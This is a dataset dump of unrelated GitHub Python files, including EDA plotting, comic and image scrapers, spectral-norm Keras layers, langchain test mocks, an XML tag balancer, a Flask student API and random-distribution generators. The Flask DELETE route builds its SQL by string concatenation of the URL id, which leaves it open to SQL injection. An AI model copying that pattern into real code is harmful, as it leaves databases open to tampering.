draw_value_count(self, data, column):\n value_count = data[column].value_counts()\n print(value_count)\n value_count.plot(kind=\"bar\", title=\"value-count\",\n figsize=(8, 8), rot=25, colormap='Paired')\n plt.ylabel(\"count\")\n plt.xlabel(\"value\")\n plt.savefig(column+\".png\")\n plt.show()\n\n\nif __name__ == '__main__':\n # preProcessing = PreProcessing()\n eda = EDA()\n basePath = \"../temp/data/\"\n\n \"\"\"获取训练和测试集\"\"\"\n trainDataFilePath = basePath + \"train_fillna.csv\"\n # testDataFilePath = basePath + \"test_fillna.csv\"\n traindata = eda.get_csv_data(trainDataFilePath)\n train_count_filepath = basePath + \"train_column_count.txt\"\n columns, values = eda.get_column_value(train_count_filepath)\n eda.bar(columns, values)\n # testdata = eda.get_csv_data(testDataFilePath)\n '''查看visitID与visitStartTime相似程度'''\n # print(len(traindata[traindata['visitStartTime']==traindata['visitId']]))\n # print(len(testdata[testdata['visitStartTime'] == testdata['visitId']]))\n '''某一列的value-count Start'''\n # print(traindata['trafficSource.campaignCode'].value_counts())\n print(traindata['device.deviceCategory'].value_counts())\n eda.draw_value_count(traindata, 'trafficSource.medium')\n '''value-count END'''\n # numer_columns = ['visitNumber', 'totals.bounces',\n # 'totals.hits', 'totals.newVisits',\n # 'totals.pageviews', 'trafficSource.adwordsClickInfo.page']\n # data = traindata.loc[:, numer_columns]\n # # print(data)\n # eda.hist(data)\n\n # for c in numer_columns:\n # print(data[c].value_counts())\n '''时间转换'''\n # visitStartTime = pd.to_datetime(traindata['visitStartTime'], unit=\"s\")\n # date = pd.to_datetime(traindata['date'].astype(str), format=\"%y%m%d\", errors='ignore')\n # print(date.loc[0:5].dt.year)\n # print(date.loc[0:5].dt.month)\n # print(date.loc[0:5].dt.day)\n # print(traindata.loc[0:5, \"visitStartTime\"])\n # print(visitStartTime.loc[0:5].astype(str))\n # # print(visitStartTime.loc[0:5].astype(str))\n # temp = date.loc[0:5]\n # traindata['totals.newVisits']\n # exclued_features = ['trafficSource.adwordsClickInfo.adNetworkType', 'trafficSource.adwordsClickInfo.isVideoAd',\n # 'trafficSource.adwordsClickInfo.page', 'trafficSource.adwordsClickInfo.slot']\n # for feature in exclued_features:\n # print(feature)\n # print(traindata[feature].unique())\n\n # print(traindata['trafficSource.campaignCode'].unique())\n\n # \"\"\"将每一列属性每个值出现的次数写入文件\"\"\"\n # eda.write_column_count(traindata, basePath + \"train_column_count.txt\")\n # eda.write_column_count(testdata, basePath + \"test_column_count.txt\")\n #\n # \"\"\"将每一列属性空值的个数写入文件\"\"\"\n # eda.write_null_column(traindata, basePath + \"train_column_null.txt\")\n # eda.write_null_column(testdata, basePath + \"test_column_null.txt\")\n\n\n\n\n","repo_name":"TcMysunshine/RevenuePrediction","sub_path":"EDA.py","file_name":"EDA.py","file_ext":"py","file_size_in_byte":5913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14887871724","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\n\nURL='https://s51.mkklcdnv51.com/mangakakalot/h1/hakaijuu/vol1_chapter_1_future_is/1.jpg'\n\n#soup = BeautifulSoup(page.content, 'html.parser')\n#page_=re.findall('(.*?)/', str(soup))\n# for i in page_:\n# print(i)\n# with requests.Session() as session:\n# resp_2 = session.get(\"https://bu3.mkklcdnbuv1.com/mangakakalot/m2/mother_im_sorry/chapter_5_chapter_5/2.jpg\", headers={\"referer\":\"https://mangakakalot.com/chapter/ro920198/chapter_5\"})\n# with open(\"xx.jpg\",\"wb\") as f:\n# f.write(resp_2.content)\ndef download_image(url):\n fullname = str(url).split('/')[-1]\n r = requests.get(url,headers={\"referer\":\"https://manganelo.com/chapter/hakaijuu/chapter_1\"})\n with open(fullname, 'wb') as outfile:\n outfile.write(r.content)\n\nif __name__ == '__main__':\n download_image('https://s51.mkklcdnv51.com/mangakakalot/h1/hakaijuu/vol1_chapter_1_future_is/5.jpg')\n print('y')\n\n","repo_name":"elyas1877/pythonProject","sub_path":"req2.py","file_name":"req2.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"24857119391","text":"# -*- coding: UTF-8 -*-\n'''\n@Project :CNN_LSTM\n@File :train_cifar10.py\n@IDE :PyCharm \n@Author :XinYi Huang\n'''\nimport numpy as np\nfrom tensorflow.keras import activations\nfrom tensorflow.python.keras.engine.input_spec import InputSpec\nfrom tensorflow.python.keras.utils import conv_utils\nfrom tensorflow.keras.layers import (Input,\n Layer,\n Dense,\n Conv2D,\n SeparableConv2D,\n Add)\nfrom tensorflow.keras.regularizers import l2\nfrom tensorflow.keras import initializers\nimport tensorflow as tf\n\n\nclass ConvSN2D(Conv2D):\n def __init__(self,\n sn_initializer=initializers.RandomNormal(0,1),\n **kwargs):\n super(ConvSN2D, self).__init__(**kwargs)\n self.sn_initiralizer = sn_initializer\n\n def get_config(self):\n config = super(ConvSN2D, self).get_config()\n config.update({\n 'sn_initializer': self.sn_initiralizer\n })\n return config\n\n def build(self, input_shape):\n\n super(ConvSN2D, self).build(input_shape)\n\n self.sn = self.add_weight(shape=(1, self.filters),\n initializer=self.sn_initiralizer,\n name='sn',\n trainable=False)\n self.built = True\n\n def call(self, input):\n def _l2normalize(v, eps=1e-12):\n return v / (tf.reduce_sum(v ** 2) ** 0.5 + eps)\n\n def power_iteration(W, u):\n\n _u = u\n _v = _l2normalize(tf.matmul(_u, tf.transpose(W, perm=[1, 0])))\n _u = _l2normalize(tf.matmul(_v, W))\n\n return _u, _v\n\n W_shape = self.kernel.shape.as_list()\n W_reshaped = tf.reshape(self.kernel, [-1, W_shape[-1]])\n _u, _v = power_iteration(W_reshaped, self.sn)\n sigma = tf.matmul(_v, W_reshaped)\n sigma = tf.matmul(sigma, tf.transpose(_u, perm=[1, 0]))\n W_bar = W_reshaped / sigma\n with tf.control_dependencies([self.sn.assign(_u)]):\n W_bar = tf.reshape(W_bar, W_shape)\n\n output = tf.nn.conv2d(input, W_bar, self.strides, self.padding.upper(),\n conv_utils.convert_data_format(self.data_format, ndim=4))\n if self.use_bias:\n output = tf.nn.bias_add(output, self.bias,\n conv_utils.convert_data_format(self.data_format, ndim=4))\n\n if self.activation is not None:\n return self.activation(output)\n\n return output\n\n\nclass ConvSN2DTranspose(Conv2D):\n '''\n If the parent class properties have been assigned real values,\n the superclass cannot assign values to these properties\n '''\n def __init__(self,\n filters,\n kernel_size,\n strides=(1, 1),\n padding='valid',\n output_padding=None,\n data_format=None,\n dilation_rate=(1, 1),\n activation=None,\n use_bias=True,\n kernel_initializer=initializers.GlorotUniform(),\n bias_initializer=initializers.Zeros(),\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None,\n sn_initiralizer=initializers.RandomNormal(0, 1),\n **kwargs):\n super(ConvSN2DTranspose, self).__init__(\n filters=filters,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n data_format=data_format,\n dilation_rate=dilation_rate,\n activation=activations.get(activation),\n use_bias=use_bias,\n kernel_initializer=kernel_initializer,\n bias_initializer=bias_initializer,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n activity_regularizer=activity_regularizer,\n kernel_constraint=kernel_constraint,\n bias_constraint=bias_constraint,\n **kwargs)\n self.sn_initiralizer = sn_initiralizer\n\n self.output_padding = output_padding\n if self.output_padding is not None:\n self.output_padding = conv_utils.normalize_tuple(\n self.output_padding, 2, 'output_padding', allow_zero=True)\n for stride, out_pad in zip(self.strides, self.output_padding):\n if out_pad >= stride:\n raise ValueError('Strides must be greater than output padding. '\n f'Received strides={self.strides}, '\n f'output_padding={self.output_padding}.')\n\n def build(self, input_shape):\n\n assert len(input_shape) == 4\n\n if self.data_format == 'channels_first':\n channel_axis = 1\n else:\n channel_axis = -1\n\n in_channels = input_shape[channel_axis]\n\n if not in_channels:\n raise ValueError('The channel dimension of the inputs '\n 'should be defined. Found `None`.')\n\n kernel_shape = self.kernel_size + (self.filters, in_channels)\n\n self.kernel = self.add_weight(\n name='kernel',\n shape=kernel_shape,\n initializer=self.kernel_initializer,\n regularizer=self.kernel_regularizer,\n constraint=self.kernel_constraint,\n trainable=True,\n dtype=self.dtype)\n\n self.sn = self.add_weight(shape=(1, in_channels),\n initializer=self.sn_initiralizer,\n name='sn',\n trainable=False)\n\n if self.use_bias:\n self.bias = self.add_weight(\n name='bias',\n shape=(self.filters,),\n initializer=self.bias_initializer,\n regularizer=self.bias_regularizer,\n constraint=self.bias_constraint,\n trainable=True,\n dtype=self.dtype)\n else:\n self.bias = None\n self.built = True\n\n def call(self, inputs):\n\n inputs_shape = tf.shape(inputs)\n batch_size = inputs_shape[0]\n if self.data_format == 'channels_first':\n h_axis, w_axis = 2, 3\n else:\n h_axis, w_axis = 1, 2\n\n dims = inputs.shape.as_list()\n height = dims[h_axis]\n width = dims[w_axis]\n height = height if height is not None else inputs_shape[h_axis]\n width = width if width is not None else inputs_shape[w_axis]\n\n kernel_h, kernel_w = self.kernel_size\n stride_h, stride_w = self.strides\n dilation_rate_y, dilation_rate_x = self.dilation_rate\n assert np.logical_and(np.greater_equal(dilation_rate_y, 1), np.greater_equal(dilation_rate_x, 1))\n\n # 获取反卷积特征形状\n if self.padding == 'same':\n out_height = height*stride_h\n out_width = height*stride_w\n elif self.padding == 'valid':\n if np.logical_and(np.equal(dilation_rate_y, 1), np.equal(dilation_rate_x, 1)) or not self.dilation_rate:\n out_height = height*stride_h + kernel_h - 1\n out_width = width*stride_w + kernel_w - 1\n elif np.logical_or(np.greater(dilation_rate_y, 1), np.greater(dilation_rate_x, 1)):\n out_height = height*stride_h+(kernel_h-1)*dilation_rate_y\n out_width = width*stride_w+(kernel_w-1)*dilation_rate_x\n else:\n raise ValueError(\"padding must be in the set {valid, same}\")\n\n if self.data_format == 'channels_first':\n output_shape_tensor = tf.cast([batch_size, self.filters, out_height, out_width], dtype=tf.int32)\n else:\n output_shape_tensor = tf.cast([batch_size, out_height, out_width, self.filters], dtype=tf.int32)\n\n def _l2normalize(v, eps=1e-12):\n return v / (tf.reduce_sum(v ** 2) ** 0.5 + eps)\n\n def power_iteration(W, u):\n\n _u = u\n _v = _l2normalize(tf.matmul(_u, tf.transpose(W, perm=[1, 0])))\n _u = _l2normalize(tf.matmul(_v, W))\n\n return _u, _v\n\n # 谱归一化操作\n W_shape = self.kernel.shape.as_list()\n W_reshaped = tf.reshape(self.kernel, [-1, W_shape[-1]])\n _u, _v = power_iteration(W_reshaped, self.sn)\n sigma = tf.matmul(_v, W_reshaped)\n sigma = tf.matmul(sigma, tf.transpose(_u, perm=[1, 0]))\n W_bar = W_reshaped / sigma\n with tf.control_dependencies([self.sn.assign(_u)]):\n W_bar = tf.reshape(W_bar, W_shape)\n\n outputs = tf.nn.conv2d_transpose(\n inputs,\n W_bar,\n output_shape_tensor,\n strides=self.strides,\n padding=self.padding.upper(),\n data_format=conv_utils.convert_data_format(self.data_format, ndim=4),\n dilations=self.dilation_rate)\n\n # if not tf.executing_eagerly():\n # # Infer the static output shape:\n # out_shape = self.compute_output_shape(inputs.shape)\n # outputs.set_shape(out_shape)\n\n if self.use_bias:\n outputs = tf.nn.bias_add(\n outputs,\n self.bias,\n data_format=conv_utils.convert_data_format(self.data_format, ndim=4))\n\n if self.activation is not None:\n return self.activation(outputs)\n return outputs\n\n def compute_output_shape(self, input_shape):\n\n input_shape = tf.TensorShape(input_shape).as_list()\n batch_size = input_shape[0]\n if self.data_format == 'channels_first':\n h_axis, w_axis = 2, 3\n else:\n h_axis, w_axis = 1, 2\n\n height = input_shape[h_axis]\n width = input_shape[w_axis]\n height = height if height is not None else input_shape[h_axis]\n width = width if width is not None else input_shape[w_axis]\n\n kernel_h, kernel_w = self.kernel_size\n stride_h, stride_w = self.strides\n dilation_rate_y, dilation_rate_x = self.dilation_rate\n assert np.logical_and(np.greater_equal(dilation_rate_y, 1), np.greater_equal(dilation_rate_x, 1))\n\n if self.padding == 'same':\n out_height = height * stride_h\n out_width = height * stride_w\n elif self.padding == 'valid':\n if np.logical_and(np.equal(dilation_rate_y, 1), np.equal(dilation_rate_x, 1)) or not self.dilation_rate:\n out_height = height * stride_h + kernel_h - 1\n out_width = width * stride_w + kernel_w - 1\n elif np.logical_or(np.greater(dilation_rate_y, 1), np.greater(dilation_rate_x, 1)):\n out_height = height * stride_h + (kernel_h - 1) * dilation_rate_y\n out_width = width * stride_w + (kernel_w - 1) * dilation_rate_x\n else:\n raise ValueError(\"padding must be in the set {valid, same}\")\n\n if self.data_format == 'channels_first':\n output_shape_tensor = [batch_size, self.filters, out_height, out_width]\n else:\n output_shape_tensor = [batch_size, out_height, out_width, self.filters]\n return output_shape_tensor\n\n def get_config(self):\n config = super(ConvSN2DTranspose, self).get_config()\n config['output_padding'] = self.output_padding\n config['sn_initiralizer'] = self.sn_initiralizer\n\n return config\n\n\nclass Squeeze(Layer):\n def __init__(self,\n **kwargs):\n super(Squeeze, self).__init__(**kwargs)\n\n def call(self, input, *args, **kwargs):\n assert len(input.shape.as_list()) == 4\n\n return tf.squeeze(input, axis=[1, 2, 3])\n\n\nclass DenseSN(Dense):\n def __init__(self, **kwargs):\n super(DenseSN, self).__init__(**kwargs)\n\n def get_config(self):\n config = super(DenseSN, self).get_config()\n return config\n\n def build(self, input_shape):\n\n super(DenseSN, self).build(input_shape)\n\n self.sn = self.add_weight(shape=(1, self.units),\n initializer=initializers.RandomNormal(0, 1),\n name='sn',\n trainable=False)\n\n self.built = True\n\n def call(self, inputs):\n def _l2normalize(v, eps=1e-12):\n return v / (tf.reduce_sum(v ** 2) ** 0.5 + eps)\n\n def power_iteration(W, u):\n _u = u\n _v = _l2normalize(tf.matmul(_u, tf.transpose(W))) # matrix transpose\n _u = _l2normalize(tf.matmul(_v, W))\n return _u, _v\n\n W_shape = self.kernel.shape.as_list()\n # Flatten the Tensor\n W_reshaped = tf.reshape(self.kernel, [-1, W_shape[-1]])\n _u, _v = power_iteration(W_reshaped, self.sn)\n # Calculate Sigma\n sigma = tf.matmul(_v, W_reshaped)\n sigma = tf.matmul(sigma, tf.transpose(_u))\n # normalize it\n W_bar = W_reshaped / sigma\n # reshape weight tensor\n with tf.control_dependencies([self.sn.assign(_u)]):\n W_bar = tf.reshape(W_bar, W_shape)\n output = tf.matmul(inputs, W_bar)\n if self.use_bias:\n output = tf.nn.bias_add(output, self.bias)\n if self.activation is not None:\n output = self.activation(output)\n return output\n\n\nclass NearestUpSampling2D(Layer):\n def __init__(self,\n method='nearest',\n scale_factor=2,\n **kwargs):\n super(NearestUpSampling2D, self).__init__(**kwargs)\n assert method in ['bilinear', 'lanczos3', 'lanczos5', 'bicubic',\n 'gaussian', 'nearest', 'area', 'mitchellcubic']\n self.method = method\n self.scale_factor = scale_factor\n\n def get_config(self):\n\n config = super(NearestUpSampling2D, self).get_config()\n config.update({\n 'method': self.method,\n 'scale_factor': self.scale_factor,\n })\n\n return config\n\n def call(self, input, *args, **kwargs):\n\n input_shape = input.shape.as_list()\n assert len(input_shape) == 4\n\n h, w = input_shape[1:-1]\n\n new_size = [h * self.scale_factor, w * self.scale_factor]\n return tf.image.resize(images=input, size=new_size, method=self.method)\n","repo_name":"JJASMINE22/SAGAN","sub_path":"CustomLayers.py","file_name":"CustomLayers.py","file_ext":"py","file_size_in_byte":14512,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"29202120208","text":"import urllib.request, urllib.error, urllib.parse, re\n\nbaseURL = \"https://www.giantitp.com/comics/\"\nlinkRgx = \"\"\"\"\"\"\n\npageNum = 1\n\nwhile (pageNum <= 1201):\n\tpageURL = baseURL + \"oots%04i.html\"%pageNum\n\tprint(pageURL)\n\treq = urllib.request.Request(pageURL, headers={'User-Agent' : \"Magic Browser\"})\n\tresponse = urllib.request.urlopen(req)\n\twebContent = response.read().decode('utf-8')\n\n\tmatches = re.findall(linkRgx, webContent)\n\tfor m in matches:\n\t\tprint(m)\n\t\text = m.split(\".\")[-1]\n\t\tfileName = \"%i.%s\"%(pageNum, ext)\n\t\ttry:\n\t\t\timgURL = m.replace(\" \", \"%20\")\n\t\t\timgReq = urllib.request.Request(imgURL, headers={'User-Agent' : \"Magic Browser\"})\n\t\t\timgResponse = urllib.request.urlopen(imgReq)\n\t\t\timgContent = imgResponse.read()\n\t\t\t\n\t\t\timgFile = open(fileName, \"wb\")\n\t\t\timgFile.write(imgContent)\n\t\t\t\n\t\t\timgFile.close()\n\t\t\t\n\t\t\tprint(\"%s written\"%fileName)\n\t\texcept:\n\t\t\tprint(\"%s failed\"%fileName)\n\tpageNum += 1\n","repo_name":"fazzitron/webcomicDownloaders","sub_path":"oots.py","file_name":"oots.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39513901738","text":"import pytest\nfrom typing import List\n\nfrom pydantic import BaseModel\nfrom langchain.tools import Tool\n\nfrom ai.question_answering.schema import (\n Question,\n Hypothesis,\n Thought,\n TargettedThought,\n DataSourceSelection,\n)\nfrom ai.question_answering.generators.base import TargettedThoughtGenerator\n\n\nclass MockAlwaysFalseComparisonFilter:\n def __call__(self, hypothesis: Thought, other_hypothesis: List[Thought]) -> bool:\n return True\n\n\nclass MockStaticDataSourceSelector:\n def __call__(self, hypothesis: Hypothesis) -> Tool:\n return DataSourceSelection(\n data_source=Tool.from_function(\n func=lambda hypothesis: \"a returned Hypothesis datum\",\n name=\"test\",\n description=\"test\",\n # args_schema=[str],\n ),\n reason=\"test\",\n )\n\n\nclass MockDiscussionGenerator:\n def __call__(self, hypothesis: Hypothesis, data: str) -> str:\n return \"test discussion\"\n\n\nclass MockDiscussionScorer:\n def __call__(\n self, hypothesis: Hypothesis, discussion: str, conclusion: str\n ) -> float:\n return 0.5\n\n\ndef test_static_thought_generator():\n hypothesis = Hypothesis(hypothesis=\"hypothesis\", data_sources=[])\n\n generator = TargettedThoughtGenerator(\n MockAlwaysFalseComparisonFilter(),\n MockStaticDataSourceSelector(),\n MockDiscussionGenerator(),\n MockDiscussionScorer(),\n )\n\n reply = generator.generate(hypothesis, [])\n\n print(reply.json())\n\n\nfrom ai.question_answering.data import LLMDataSourceSelector\nfrom ai.question_answering.generators.thought.llm_discussion import (\n LLMHypothesisDataExplainer,\n)\nfrom ai.question_answering.generators.thought.llm_scoring import LLMDataExplainerScorer\n\n\ndef test_llm_generator():\n from langchain.chat_models import ChatOpenAI\n\n model_name = \"gpt-4\"\n temperature = 1.0\n model = ChatOpenAI(model_name=model_name, temperature=temperature)\n\n class ToolInput(BaseModel):\n question: str\n\n data_sources_desc = [\n \"SQL table of sales data\",\n \"view of sales per country\",\n \"view of sales per product\",\n \"view of sales cadence per customer\",\n \"view of change in sales over time per customer\",\n ]\n\n dummy_data = \"Uk sales = 3%.\"\n\n data_sources = [\n Tool.from_function(\n func=lambda hypothesis: dummy_data,\n name=desc,\n description=desc,\n args_schema=ToolInput,\n )\n if desc == \"view of sales per country\"\n else Tool.from_function(\n func=lambda hypothesis: \"\",\n name=desc,\n description=desc,\n args_schema=ToolInput,\n )\n for desc in data_sources_desc\n ]\n\n generator = TargettedThoughtGenerator(\n MockAlwaysFalseComparisonFilter(),\n LLMDataSourceSelector(data_sources, model),\n LLMHypothesisDataExplainer(model),\n LLMDataExplainerScorer(model),\n )\n\n hypothesis = Hypothesis(\n hypothesis=\"The UK has the highest sales\", data_sources=data_sources\n )\n\n thought = generator.generate(hypothesis, [])\n print()\n print(thought.data, thought.discussion, thought.score)\n","repo_name":"suvalaki/automatic_insights","sub_path":"tests/question_answering/generators/test_thought.py","file_name":"test_thought.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23728747784","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nSimple ad-hoc XML fixed\n\"\"\"\n\nimport input_lexer\n\n\ndef shrink_broken_markup_interval(offset, length, all_intervals):\n covered, broken_1st, broken_last = input_lexer.find_covered_intervals(offset, length, all_intervals)\n end = offset + length\n\n if broken_1st:\n if covered[0].int_type != input_lexer.IntervalType.general:\n # general text can be broken\n if len(covered) < 2:\n return None\n else:\n offset = covered[1].offs\n if broken_last:\n if covered[-1].int_type != input_lexer.IntervalType.general:\n # general text can be broken\n if len(covered) < 2:\n return None\n else:\n end = covered[-2].end\n rlen = end - offset\n if rlen <= 0:\n return None\n return offset, rlen\n\n\ndef balance_unbalanced_text(covered_intervals):\n \"\"\"\n :param covered_intervals: [xmllexer.XmlInterval] -- correct unbalanced markup\n :return: ([intervals to prepend to body], [intervals to append to body], [intervals to prepend ref ref], [intervals to append to ref])\n \"\"\"\n\n elem_append = []\n elem_prepend = []\n\n ref_append = []\n ref_prepend = []\n\n # going right\n stack = []\n for i in covered_intervals:\n if i.int_type == input_lexer.IntervalType.opentag:\n stack.append(i)\n elif i.int_type == input_lexer.IntervalType.closetag and len(stack):\n stack.pop()\n\n for i in stack:\n elem_append.insert(0, i.create_opposite_tag())\n ref_append.append(i)\n\n # going left\n stack = []\n back_intervals = list(covered_intervals)\n back_intervals.reverse()\n for i in back_intervals:\n if i.int_type == input_lexer.IntervalType.closetag:\n stack.append(i)\n elif i.int_type == input_lexer.IntervalType.opentag and len(stack):\n stack.pop()\n\n for i in stack:\n elem_prepend.append(i.create_opposite_tag())\n ref_prepend.insert(0, i)\n\n return elem_prepend, elem_append, ref_prepend, ref_append\n\n# just a test\nif __name__ == '__main__':\n src = \"\"\"t0t1t2t3t4\"\"\"\n ints = input_lexer.lex_xml(src)\n p, a, rp, ra = balance_unbalanced_text(ints)\n print(\"\".join([pi.srepr for pi in p]))\n print(src)\n print(\"\".join([ai.srepr for ai in a]))\n print(\"============\")\n print(\"\".join([pi.srepr for pi in rp]) + \"\" + \"\".join([pi.srepr for pi in ra]))\n","repo_name":"spbu-se/pldoctoolkit","sub_path":"doc-clone-miner/xmlfixup.py","file_name":"xmlfixup.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"71417791936","text":"from time import sleep\nmaior = 0\nmenor = 1000\nfor c in range(1, 6):\n peso = float(input('Digite o {}° peso:'.format(c)))\n if peso > maior:\n maior = peso\n if peso < menor:\n menor = peso\nprint('O maior peso foi {}kg e o menor foi {}kg'.format(maior, menor))\n","repo_name":"Italo-Angelo/exercicios","sub_path":"e055.py","file_name":"e055.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"17352815564","text":"s=raw_input(\"enter string\")\nc=0\nlen1=len(s)\nfor i in range(len1-2):\n\tif s[i]=='b':\n\t\tif s[i+1]=='o':\n\t\t\tif s[i+2]=='b':\n\t\t\t\tc=c+1;\n\t\nprint(\"No. of times are \")\nprint(c)\n","repo_name":"PoojaBiyani7/pythonpgs","sub_path":"bob.py","file_name":"bob.py","file_ext":"py","file_size_in_byte":169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27441625593","text":"from flask import Flask, request, jsonify\nfrom flask_mysqldb import MySQL\n\n\napp = Flask(__name__)\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'flask'\napp.config['MYSQL_PASSWORD'] = 'flask'\napp.config['MYSQL_DB'] = 'flask'\n\nmysql = MySQL(app)\n\n\n@app.route('/')\ndef hello_world():\n\treturn 'Hello world!'\n\n\n@app.route('/hello', methods=['GET'])\ndef hello():\n\treturn 'hello'\n\n\n@app.route('/world', methods=['GET'])\ndef world():\n\treturn 'world'\n\n\n@app.route('/student', methods=['GET', 'POST'])\ndef student():\n\tif request.method == \"POST\":\n\t\tfirstName = request.json['First name']\n\t\tlastName = request.json.get('Last name', \"\")\n\t\tage = int(request.json.get('Age', \"18\"))\n\t\tcur = mysql.connection.cursor()\n\t\tcur.execute(\"INSERT INTO students(firstname, lastname, age) VALUES (%s, %s, %s)\", (firstName, lastName, age))\n\t\tmysql.connection.commit()\n\t\tcur.close()\n\t\tstudent = {\n\t\t\t'Firt name': firstName,\n\t\t\t'Last name': lastName,\n\t\t\t'Age': age\n\t\t}\n\t\treturn jsonify({'student': student})\n\telse:\n\t\tcur = mysql.connection.cursor()\n\t\tcur.execute(\"SELECT * FROM students\")\n\t\tres = cur.fetchall()\n\t\tcur.close()\n\n\t\tstudents = []\n\t\tfor row in res:\n\t\t\tstudent = {\n\t\t\t\t'ID': row[0],\n\t\t\t\t'Firt name': row[1],\n\t\t\t\t'Last name': row[2],\n\t\t\t\t'Age': row[3]\n\t\t\t}\n\t\t\tstudents.append(student)\n\n\t\treturn jsonify({'students': students})\n\n\n@app.route('/student/', methods=['DELETE'])\ndef delete(id):\n\tcur = mysql.connection.cursor()\n\tcur.execute(\"DELETE FROM students WHERE id=\"+id)\n\tmysql.connection.commit()\n\tcur.close()\n\t\n\treturn \"success\"\t\n\n\nif __name__ == '__main__':\n\tapp.run()\n","repo_name":"KaisongHuang/python_restful","sub_path":"helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3880851619","text":"import pandas as pd\nfrom sql_cnxn import redshift_cnxn\n\ndef to_int(df):\n cols = ['tp_job_id']\n for col in cols:\n df[col] = df[col].apply(lambda x: int(x) if x == x else \"\")\n\nhistoric_df = pd.read_csv(r'/Volumes/Shared/Vetting and Quality/Business Validation/Negative Ratings/cleaned_negative_ratings_historic.csv'\n , delimiter= ',', header=0,\n parse_dates=['date_posted'], encoding='latin1')\n\nnew_ratings_df = pd.read_sql(r\"\"\"select tm_user_id as tp_user_id,\nho_user_id,\njob_id + 12480 as job_ref,\noverall_rating,\ncomment,\ndate_posted,\nt.date_first_active_tm as first_active_date,\n'' as vq_check\nfrom\n\t(\n\tselect tm_user_id,\n\tho_user_id,\n\tjob_id,\n\toverall_rating,\n\tcomment,\n\tdate_posted,\n\trow_number() over(partition by tm_job_id order by date_posted asc) as row_n\n\tfrom \n\t\t(\n\t\tselect tm_user_id,\n\t\tho_user_id,\n\t\tjob_id,\n\t\toverall_rating,\n\t\tcomment,\n\t\tconcat(tm_user_id,job_id) as tm_job_id,\n\t\tcreated_ts as date_posted\n\t\tfrom wh_ratings r\n\t\twhere date_posted >= case\n when extract(dow\n from current_date) = 1 then dateadd(day,-3,current_date)\n else dateadd(day,-1,current_date)\n end\n \tand date_posted <> current_date\n\t\tand overall_rating <= 6)\n) as t1\ninner join wh_tradesman t on t1.tm_user_id = t.user_id\nwhere row_n = 1\norder by date_posted\"\"\", redshift_cnxn, parse_dates=['date_posted'])\n\nhistoric_df['tp_job_id'] = historic_df['tp_user_id'].astype(str) + historic_df['job_ref'].astype(str)\n\nto_int(historic_df)\n\nnew_ratings_df['tp_job_id'] = new_ratings_df['tp_user_id'].astype(str) + new_ratings_df['job_ref'].astype(str)\n\nto_int(new_ratings_df)\n\nratings_de_dupe_list = historic_df['tp_job_id'].to_list()\n\nremove_flag = []\n\nfor row in new_ratings_df['tp_job_id']:\n if row in ratings_de_dupe_list:\n remove_flag.append(\"y\")\n else:\n remove_flag.append(\"n\")\n\nnew_ratings_df['remove_flag'] = remove_flag\n\nnew_ratings_df = new_ratings_df[new_ratings_df.remove_flag != 'y']\n\nnew_ratings_df = new_ratings_df.drop(['remove_flag'], axis=1)\n\nnew_ratings_df.to_csv(r'/Volumes/Shared/Vetting and Quality/Business Validation/Negative Ratings/negative_ratings.csv',\n index=False, sep=',', encoding='utf-8')\n\n\n","repo_name":"ryanelhamri/negative_ratings","sub_path":"new_ratings.py","file_name":"new_ratings.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72018126655","text":"import math\nimport random as rnd\nimport matplotlib.pyplot as plt\n\n\ndef ravnomer(__a: float, __b: float, __R: float) -> float:\n assert 0 <= __R <= 1\n return __a + (__b - __a) * __R\n\n\ndef gauss(__mx: float, __sx: float, __RList: list) -> float:\n for __R in __RList:\n assert 0 <= __R <= 1\n n = len(__RList)\n return sum([x - n / float(2) for x in __RList]) * math.sqrt(12 / float(n)) * __sx + __mx\n\n\ndef exponential(__lambda: float, __R: float) -> float:\n assert 0 <= __R <= 1\n return (-1 / float(__lambda)) * math.log(__R)\n\n\ndef gamma(__lambda: float, __nu: float, __RList: list) -> float:\n for __R in __RList:\n assert 0 <= __R <= 1\n return (-1 / float(__lambda)) * sum([math.log(x) for x in __RList])\n\n\ndef triangleMax(__a: float, __b: float, __R1: float, __R2: float) -> float:\n assert 0 <= __R1 <= 1\n assert 0 <= __R2 <= 1\n return ravnomer(__a, __b, max(__R1, __R2))\n\n\ndef triangleMin(__a: float, __b: float, __R1: float, __R2: float) -> float:\n assert 0 <= __R1 <= 1\n assert 0 <= __R2 <= 1\n return ravnomer(__a, __b, min(__R1, __R2))\n\n\ndef simpson(__a: float, __b: float, __R1: float, __R2: float):\n assert 0 <= __R1 <= 1\n assert 0 <= __R2 <= 1\n return ravnomer(__a / float(2), __b / float(2), __R1) + ravnomer(__a / float(2), __b / float(2), __R2)\n\n\ndef getRandom():\n return rnd.uniform(0, 1)\n\n\ndef ravnomer_TEST() -> list:\n a = 1\n b = 51\n size = 1000000\n return [ravnomer(a, b, getRandom()) for _ in range(0, 